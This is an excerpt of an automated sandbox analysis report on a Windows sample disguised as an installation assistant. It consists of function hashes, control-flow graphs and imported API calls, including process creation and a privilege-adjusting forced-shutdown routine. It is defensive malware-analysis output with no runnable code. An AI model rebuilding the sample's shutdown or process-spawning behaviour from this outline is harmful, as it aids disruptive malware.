                                    • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                    • API String ID: 2738559852-1563143607
                                    • Opcode ID: b0f16579b11d8e6e7da52a181cd9e4e64cd9789ba1fd1c69f4ac809145028102
                                    • Instruction ID: 6f37787a94fd6a45db14fb83d1f557e4a9daae63c680c0d9eb62942993df4b16
                                    • Opcode Fuzzy Hash: b0f16579b11d8e6e7da52a181cd9e4e64cd9789ba1fd1c69f4ac809145028102
                                    • Instruction Fuzzy Hash: F262797060D7918FCB24CF58C490A5ABBE2AFDA308F249D1EE899CB755D734D8468B43

                                    Control-flow Graph
                                    • Rendered graph not captured; graph nodes call GetConsoleMode, ReadConsoleW, ReadFile and GetLastError (raw edge list omitted)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8Q
                                    • API String ID: 0-4022487301
                                    • Opcode ID: ad06768193181b6588c8723a2c7609cb5523d63603c69ea9183430f9d822092c
                                    • Instruction ID: 7516ee41ff6cd33fefac4113cad4d18464ab88826efe22c08df67ccef96e0ca0
                                    • Opcode Fuzzy Hash: ad06768193181b6588c8723a2c7609cb5523d63603c69ea9183430f9d822092c
                                    • Instruction Fuzzy Hash: A8C10670E04249AFDF11DFA9C8A0BEDBFB1AF4A318F204159E950ABB81C7759945CB70

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 6933 6c18406c-6c18409c call 6c1844ec 6936 6c18409e-6c1840a9 call 6c16f9df 6933->6936 6937 6c1840b7-6c1840c3 call 6c18160c 6933->6937 6944 6c1840ab-6c1840b2 call 6c16f9cc 6936->6944 6942 6c1840dc-6c184125 call 6c184457 6937->6942 6943 6c1840c5-6c1840da call 6c16f9df call 6c16f9cc 6937->6943 6953 6c184192-6c18419b GetFileType 6942->6953 6954 6c184127-6c184130 6942->6954 6943->6944 6951 6c184391-6c184395 6944->6951 6955 6c18419d-6c1841ce GetLastError call 6c16f9f2 CloseHandle 6953->6955 6956 6c1841e4-6c1841e7 6953->6956 6958 6c184132-6c184136 6954->6958 6959 6c184167-6c18418d GetLastError call 6c16f9f2 6954->6959 6955->6944 6970 6c1841d4-6c1841df call 6c16f9cc 6955->6970 6962 6c1841e9-6c1841ee 6956->6962 6963 6c1841f0-6c1841f6 6956->6963 6958->6959 6964 6c184138-6c184165 call 6c184457 6958->6964 6959->6944 6967 6c1841fa-6c184248 call 6c1817b0 6962->6967 6963->6967 6968 6c1841f8 6963->6968 6964->6953 6964->6959 6975 6c18424a-6c184256 call 6c184666 6967->6975 6976 6c184267-6c18428f call 6c184710 6967->6976 6968->6967 6970->6944 6975->6976 6982 6c184258 6975->6982 6983 6c184291-6c184292 6976->6983 6984 6c184294-6c1842d5 6976->6984 6985 6c18425a-6c184262 call 6c17b925 6982->6985 6983->6985 6986 6c1842f6-6c184304 6984->6986 6987 6c1842d7-6c1842db 6984->6987 6985->6951 6988 6c18430a-6c18430e 6986->6988 6989 6c18438f 6986->6989 6987->6986 6991 6c1842dd-6c1842f1 6987->6991 6988->6989 6992 6c184310-6c184343 CloseHandle call 6c184457 6988->6992 6989->6951 6991->6986 6996 6c184345-6c184371 GetLastError call 6c16f9f2 call 6c18171f 6992->6996 6997 6c184377-6c18438b 6992->6997 6996->6997 6997->6989
                                    APIs
                                      • Part of subcall function 6C184457: CreateFileW.KERNEL32(00000000,00000000,?,6C184115,?,?,00000000,?,6C184115,00000000,0000000C), ref: 6C184474
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C184180
                                    • __dosmaperr.LIBCMT ref: 6C184187
                                    • GetFileType.KERNEL32(00000000), ref: 6C184193
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C18419D
                                    • __dosmaperr.LIBCMT ref: 6C1841A6
                                    • CloseHandle.KERNEL32(00000000), ref: 6C1841C6
                                    • CloseHandle.KERNEL32(6C17B0D0), ref: 6C184313
                                    • GetLastError.KERNEL32 ref: 6C184345
                                    • __dosmaperr.LIBCMT ref: 6C18434C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: 8Q
                                    • API String ID: 4237864984-4022487301
                                    • Opcode ID: 49d1ca81cc0b727ece7ab65a91d9e0e20da067ca9cfe96d86b511335d5bd3c71
                                    • Instruction ID: 0a0251a1d07ed42bc018902475f0689b48f8d0381f4d3a1232da2d04ad20015b
                                    • Opcode Fuzzy Hash: 49d1ca81cc0b727ece7ab65a91d9e0e20da067ca9cfe96d86b511335d5bd3c71
                                    • Instruction Fuzzy Hash: 2BA14932A091549FCF09CF68C8A17EE7BB5AB07328F244259E821EF7C1CB359816CB51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7002 6c13c1e0-6c13c239 call 6c166b70 7005 6c13c260-6c13c269 7002->7005 7006 6c13c2b0-6c13c2b5 7005->7006 7007 6c13c26b-6c13c270 7005->7007 7008 6c13c330-6c13c335 7006->7008 7009 6c13c2b7-6c13c2bc 7006->7009 7010 6c13c272-6c13c277 7007->7010 7011 6c13c2f0-6c13c2f5 7007->7011 7016 6c13c33b-6c13c340 7008->7016 7017 6c13c489-6c13c4b9 call 6c16b3a0 7008->7017 7012 6c13c2c2-6c13c2c7 7009->7012 7013 6c13c407-6c13c41b 7009->7013 7018 6c13c372-6c13c3df WriteFile 7010->7018 7019 6c13c27d-6c13c282 7010->7019 7014 6c13c431-6c13c448 WriteFile 7011->7014 7015 6c13c2fb-6c13c300 7011->7015 7023 6c13c23b-6c13c250 7012->7023 7024 6c13c2cd-6c13c2d2 7012->7024 7022 6c13c41f-6c13c42c 7013->7022 7025 6c13c452-6c13c47f call 6c16b920 ReadFile 7014->7025 7015->7025 7026 6c13c306-6c13c30b 7015->7026 7028 6c13c346-6c13c36d 7016->7028 7029 6c13c4be-6c13c4c3 7016->7029 7017->7005 7020 6c13c3e9-6c13c3fd WriteFile 7018->7020 7019->7020 7021 6c13c288-6c13c28d 7019->7021 7020->7013 7021->7005 7030 6c13c28f-6c13c2aa 7021->7030 7022->7005 7034 6c13c253-6c13c258 7023->7034 7024->7005 7031 6c13c2d4-6c13c2e7 7024->7031 7025->7017 7026->7005 7033 6c13c311-6c13c32b 7026->7033 7028->7034 7029->7005 7036 6c13c4c9-6c13c4d7 7029->7036 7030->7034 7031->7034 7033->7022 7034->7005
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :uW$;uW$;uW$> 4!$> 4!
                                    • API String ID: 0-4100612575
                                    • Opcode ID: 7cc9b1f253ee2e4e6a4548a3b501d27e2c616b9bf371c6a37fe57e3469c6404d
                                    • Instruction ID: e8cf6f4e28ee1adf9f8b31180e0bef021ee0df68075777cd0808048b8075677a
                                    • Opcode Fuzzy Hash: 7cc9b1f253ee2e4e6a4548a3b501d27e2c616b9bf371c6a37fe57e3469c6404d
                                    • Instruction Fuzzy Hash: 5F71BDB0208365EFC710DF55C890B6ABBF4FF8A708F104A2EF488D6650D3B5D8588B96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K?Jo$K?Jo$`Rlx$7eO
                                    • API String ID: 0-174837320
                                    • Opcode ID: 986b23844f3d8206fb606f26c4c05519f586eb94315e480fea59ce24723491c6
                                    • Instruction ID: 548aafe359a4b5cd5304b0fbd78267707936163d2420c18fdad2d9d15673df50
                                    • Opcode Fuzzy Hash: 986b23844f3d8206fb606f26c4c05519f586eb94315e480fea59ce24723491c6
                                    • Instruction Fuzzy Hash: 324297B86097518FD754CF18C090A1ABBF1EFD9358F20AE1EE59987B60E638D844CB43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;T55
                                    • API String ID: 0-2572755013
                                    • Opcode ID: bbc34b7b8b0fceca03248c58e2d82e2266b789801f5732ae36f19d7c11e5d07f
                                    • Instruction ID: ee18af5822155518251048c6003d973cedd4cd4f51d62d321acf54e7c6291525
                                    • Opcode Fuzzy Hash: bbc34b7b8b0fceca03248c58e2d82e2266b789801f5732ae36f19d7c11e5d07f
                                    • Instruction Fuzzy Hash: 8E03E732645B018FC728CF28C8D0699B7E3AFD5324719CA6DC0A64B7A5DB78B54BCB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7579 6c164ff0-6c165077 CreateProcessA 7580 6c1650ca-6c1650d3 7579->7580 7581 6c1650d5-6c1650da 7580->7581 7582 6c1650f0-6c16510b 7580->7582 7583 6c165080-6c1650c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6c1650dc-6c1650e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6c1650e3-6c165118 7584->7585
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: D
                                    • API String ID: 963392458-2746444292
                                    • Opcode ID: 8d884013ad7deda68d265ab2aa2a5331267cb4aff5e24f31e8c492f82daf6ed1
                                    • Instruction ID: 223ae69208f10e97906ae1d5fc719e4d21a0be58b76a589e0f02083fe1f09ff6
                                    • Opcode Fuzzy Hash: 8d884013ad7deda68d265ab2aa2a5331267cb4aff5e24f31e8c492f82daf6ed1
                                    • Instruction Fuzzy Hash: 103102708093808FD740DF29C19872ABBF0EB9A318F509A1DF8D986251E7B8D598CF43

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7587 6c17bc5e-6c17bc7a 7588 6c17bc80-6c17bc82 7587->7588 7589 6c17be39 7587->7589 7590 6c17bca4-6c17bcc5 7588->7590 7591 6c17bc84-6c17bc97 call 6c16f9df call 6c16f9cc call 6c170120 7588->7591 7592 6c17be3b-6c17be3f 7589->7592 7593 6c17bcc7-6c17bcca 7590->7593 7594 6c17bccc-6c17bcd2 7590->7594 7609 6c17bc9c-6c17bc9f 7591->7609 7593->7594 7596 6c17bcd4-6c17bcd9 7593->7596 7594->7591 7594->7596 7598 6c17bcdb-6c17bce7 call 6c17ac69 7596->7598 7599 6c17bcea-6c17bcfb call 6c17be40 7596->7599 7598->7599 7607 6c17bcfd-6c17bcff 7599->7607 7608 6c17bd3c-6c17bd4e 7599->7608 7612 6c17bd26-6c17bd32 call 6c17beb1 7607->7612 7613 6c17bd01-6c17bd09 7607->7613 7610 6c17bd95-6c17bdb7 WriteFile 7608->7610 7611 6c17bd50-6c17bd59 7608->7611 7609->7592 7614 6c17bdc2 7610->7614 7615 6c17bdb9-6c17bdbf GetLastError 7610->7615 7617 6c17bd85-6c17bd93 call 6c17c2c3 7611->7617 7618 6c17bd5b-6c17bd5e 7611->7618 7621 6c17bd37-6c17bd3a 7612->7621 7619 6c17bd0f-6c17bd1c call 6c17c25b 7613->7619 7620 6c17bdcb-6c17bdce 7613->7620 7622 6c17bdc5-6c17bdca 7614->7622 7615->7614 7617->7621 7624 6c17bd75-6c17bd83 call 6c17c487 7618->7624 7625 6c17bd60-6c17bd63 7618->7625 7628 6c17bd1f-6c17bd21 7619->7628 7623 6c17bdd1-6c17bdd6 7620->7623 7621->7628 7622->7620 7629 6c17be34-6c17be37 7623->7629 7630 6c17bdd8-6c17bddd 7623->7630 7624->7621 7625->7623 7631 6c17bd65-6c17bd73 call 6c17c39e 7625->7631 7628->7622 7629->7592 7635 6c17bddf-6c17bde4 7630->7635 7636 6c17be09-6c17be15 7630->7636 7631->7621 7641 6c17bde6-6c17bdf8 call 6c16f9cc call 6c16f9df 7635->7641 7642 6c17bdfd-6c17be04 call 6c16f9f2 7635->7642 7639 6c17be17-6c17be1a 7636->7639 7640 6c17be1c-6c17be2f call 6c16f9cc call 6c16f9df 7636->7640 7639->7589 7639->7640 7640->7609 7641->7609 7642->7609
                                    APIs
                                      • Part of subcall function 6C17BEB1: GetConsoleCP.KERNEL32(?,6C17B0D0,?), ref: 6C17BEF9
                                    • WriteFile.KERNEL32(?,?,6C1846EC,00000000,00000000,?,00000000,00000000,6C185AB6,00000000,00000000,?,00000000,6C17B0D0,6C1846EC,00000000), ref: 6C17BDAF
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000,?,?,?,?,00000000,?), ref: 6C17BDB9
                                    • __dosmaperr.LIBCMT ref: 6C17BDFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 251514795-4022487301
                                    • Opcode ID: 836a8accd3629a9c2e11626c356fc9129d45cd57d186f84e17e2445370729e5b
                                    • Instruction ID: 1ebc2c36a9feab0aab793b58196dfe649ed425043cde173813340403a5371c48
                                    • Opcode Fuzzy Hash: 836a8accd3629a9c2e11626c356fc9129d45cd57d186f84e17e2445370729e5b
                                    • Instruction Fuzzy Hash: C851F671A0520AAFDB21DFA9C880BEEBBB9EF0631CF150451E510ABA91DB349945C7B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7654 6c165b90-6c165b9c 7655 6c165b9e-6c165ba9 7654->7655 7656 6c165bdd 7654->7656 7658 6c165bbf-6c165bcc call 6c0301f0 call 6c170b18 7655->7658 7659 6c165bab-6c165bbd 7655->7659 7657 6c165bdf-6c165c57 7656->7657 7660 6c165c83-6c165c89 7657->7660 7661 6c165c59-6c165c81 7657->7661 7667 6c165bd1-6c165bdb 7658->7667 7659->7658 7661->7660 7663 6c165c8a-6c165d49 call 6c032250 call 6c032340 call 6c169379 call 6c02e010 call 6c167088 7661->7663 7667->7657
                                    APIs
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165D31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Ios_base_dtorstd::ios_base::_
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 323602529-1866435925
                                    • Opcode ID: 8ebbbe49d9a24212a7e6480042f818a5c4d886c957ae478d1df7a148976e14d9
                                    • Instruction ID: 20de6d37a9d1243ed9a3e722342e77bbe3a44a9d277a8031b73c604f7e9145f5
                                    • Opcode Fuzzy Hash: 8ebbbe49d9a24212a7e6480042f818a5c4d886c957ae478d1df7a148976e14d9
                                    • Instruction Fuzzy Hash: F95143B5900B008FD725CF2AC495BA7BBF1BB49318F108A2DD8864BB91D775B909CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7699 6c17b925-6c17b939 call 6c1815a2 7702 6c17b93f-6c17b947 7699->7702 7703 6c17b93b-6c17b93d 7699->7703 7705 6c17b952-6c17b955 7702->7705 7706 6c17b949-6c17b950 7702->7706 7704 6c17b98d-6c17b9ad call 6c18171f 7703->7704 7716 6c17b9af-6c17b9b9 call 6c16f9f2 7704->7716 7717 6c17b9bb 7704->7717 7709 6c17b957-6c17b95b 7705->7709 7710 6c17b973-6c17b983 call 6c1815a2 CloseHandle 7705->7710 7706->7705 7708 6c17b95d-6c17b971 call 6c1815a2 * 2 7706->7708 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7719 6c17b985-6c17b98b GetLastError 7710->7719 7721 6c17b9bd-6c17b9c0 7716->7721 7717->7721 7719->7704
                                    APIs
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,6C18425F), ref: 6C17B97B
                                    • GetLastError.KERNEL32(?,00000000,?,6C18425F), ref: 6C17B985
                                    • __dosmaperr.LIBCMT ref: 6C17B9B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__dosmaperr
                                    • String ID:
                                    • API String ID: 2583163307-0
                                    • Opcode ID: bca512c795c5c6ed2e752e31d0b8a8d042381cf14078d248fcfe7002c235385d
                                    • Instruction ID: 732dcfda0c3e489f338f28492dfddfaa7a4bdd812cfa71d9e9484cc162b09b32
                                    • Opcode Fuzzy Hash: bca512c795c5c6ed2e752e31d0b8a8d042381cf14078d248fcfe7002c235385d
                                    • Instruction Fuzzy Hash: 4D014E73A4A2205BC620063B9455BAE37654F93B3CF394359F83A87AC1DF60C8458270

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7944 6c170b9c-6c170ba7 7945 6c170bbe-6c170bcb 7944->7945 7946 6c170ba9-6c170bbc call 6c16f9cc call 6c170120 7944->7946 7948 6c170c06-6c170c0f call 6c17ae75 7945->7948 7949 6c170bcd-6c170be2 call 6c170cb9 call 6c17873e call 6c179c60 call 6c17b898 7945->7949 7957 6c170c10-6c170c12 7946->7957 7948->7957 7963 6c170be7-6c170bec 7949->7963 7964 6c170bf3-6c170bf7 7963->7964 7965 6c170bee-6c170bf1 7963->7965 7964->7948 7966 6c170bf9-6c170c05 call 6c1747bb 7964->7966 7965->7948 7966->7948
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8Q
                                    • API String ID: 0-4022487301
                                    • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                    • Instruction ID: 756154085fcb46bf4b76c9b748c0a207fe0a9a99fba3f3617cf1fbd40877a8c7
                                    • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                    • Instruction Fuzzy Hash: 1CF0FF72601B546AD6315A2A8C00BDB36A89F8337CF200755E87193ED0DB7AE40ACAB1
                                    APIs
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165AB4
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165AF4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Ios_base_dtorstd::ios_base::_
                                    • String ID:
                                    • API String ID: 323602529-0
                                    • Opcode ID: 6db1446b4cc222ba87748be623d3f9e03d9ce2316da49e6fd11e5f5b49a2c8e4
                                    • Instruction ID: 3d280b5fa56dbeedfc0dd684d336f4e47edb4d1976790f95b772a5966c28bcd4
                                    • Opcode Fuzzy Hash: 6db1446b4cc222ba87748be623d3f9e03d9ce2316da49e6fd11e5f5b49a2c8e4
                                    • Instruction Fuzzy Hash: FB513771201B00DBE725CF25C494BD6BBF4BB04718F448A1CD4AA5BB92DB30B559CB80
                                    APIs
                                    • GetLastError.KERNEL32(6C196DD8,0000000C), ref: 6C16EF52
                                    • ExitThread.KERNEL32 ref: 6C16EF59
                                    Similarity
                                    • API ID: ErrorExitLastThread
                                    • String ID:
                                    • API String ID: 1611280651-0
                                    APIs
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    APIs
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000000,?,6C184115,?,?,00000000,?,6C184115,00000000,0000000C), ref: 6C184474
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: g)''
                                    • API String ID: 4218353326-3487984327
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 6C165D6A
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C165D76
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C165D84
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C165DAB
                                    • NtInitiatePowerAction.NTDLL ref: 6C165DBF
                                    Strings
                                    Similarity
                                    • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3256374457-3733053543
                                    Strings
                                    Similarity
                                    • API ID:
